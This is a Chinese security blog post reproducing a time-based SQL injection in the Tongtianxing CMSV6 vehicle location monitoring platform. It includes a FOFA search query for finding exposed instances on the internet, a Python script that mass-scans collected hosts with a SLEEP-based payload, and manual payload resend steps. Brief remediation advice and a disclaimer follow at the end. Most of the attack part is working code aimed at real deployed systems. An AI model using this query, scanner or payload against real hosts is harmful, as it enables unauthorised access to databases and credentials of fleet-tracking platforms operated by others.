漏洞复现:通天星 CMSV6 车载定位监控平台 disable SQL 注入漏洞

2025-01-27 8 0

一、漏洞介绍及声明

通天星CMSV6车载定位监控平台的disable存在SQL注入漏洞,攻击者可以利用该漏洞读取数据库信息,包括但不限于管理员账号密码、重要业务信息等,甚至可以向服务器上传恶意的后门文件来获取系统权限。

个人声明:该漏洞是在2024年护网期间被报出来的,现在其POC已经被公开,本文对该漏洞进行的复现仅作为教学及交流目的,如果任何个人或组织利用本文中的信息进行非法活动,与本文的作者或发布者无关!

二、进行资产收集

我这里使用的是FofaViewer,使用前需要配置apikey

FOFA搜索语法:body="/808gps/",将查询得到的数据导出来

导出的数据是.xlsx格式的,将导出的表格的HOST这一列复制到.txt文件中然后使用POC.py脚本进行漏洞批量扫描

三、使用Python脚本快速筛选存在漏洞的网站

使用以下POC.py脚本批量扫描是否存在漏洞,cmd打开命令行使用python POC.py -f HOST.txt >> 1.txt筛选存在漏洞的URL,并将其输出到1.txt文件中:

import requests
import time
import warnings
import argparse

warnings.filterwarnings("ignore")

# 通天星 CMSV6 车载定位监控平台 disable SQL 注入漏洞
def scan_vuln(url):
payload = "/edu_security_officer/disable;downloadLogger.action?ids=1+AND+(SELECT+2688+FROM+(SELECT(SLEEP(5)))kOIi)"
start_time = time.time()
try:
  response = requests.get(url + payload, timeout=10, verify=False)
  end_time = time.time()
  if end_time - start_time > 5 and response.status_code and "Burp Suite" not in response.text:
      print(f"[+] {url} 存在:通天星 CMSV6 车载定位监控平台 disable SQL 注入漏洞")
  else:
      print(f"[-] {url} 不存在该漏洞")
except requests.exceptions.RequestException as e:
  print(f"[-] {url} request failed: {e}")

if __name__ == "__main__":
parser = argparse.ArgumentParser(description="漏洞扫描器")
parser.add_argument('-u', '--url', help='目标URL')
parser.add_argument('-f', '--file', help='包含目标URL的文件')

args = parser.parse_args()

if args.file:
  with open(args.file, 'r') as f:
      for line in f:
          url = line.strip()
          scan_vuln(url)
elif args.url:
  scan_vuln(args.url)

批量漏洞扫描的部分结果:

四、进行漏洞复现

随便访问一个存在该漏洞的URL,抓包然后添加payload重发:

payload="/edu_security_officer/disable;downloadLogger.action?ids=1+AND+(SELECT+2688+FROM+(SELECT(SLEEP(5)))kOIi)"

修改payload,将休眠时间设置为2秒,再次重发,发现页面响应时间变为2秒左右,到这里就可以证明此处存在通天星 CMSV6 车载定位监控平台 disable SQL 注入漏洞了:

payload="/edu_security_officer/disable;downloadLogger.action?ids=1+AND+(SELECT+2688+FROM+(SELECT(SLEEP(2)))kOIi)"

五、修复建议

  • 建议对参数ids进行过滤操作,或者可以采用预处理语句,还可以限制数据库响应时间
  • 最好通过官网或者联系官方售后获取新版本安装包或者漏洞补丁

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

burpsuite最新版实践分享
pwndbg:一款专为安全漏洞分析设计的GDB插件
WordPress SEO Plugin by Squirrly SEO 认证SQL注入漏洞(CVE-2025-22783)
从靶场到实战:双一流高校多个高危漏洞
THN 每周回顾:顶级网络安全威胁、工具与技巧 [1月27日]
DroneXtract:一款针对无人机的网络安全数字取证工具

发布评论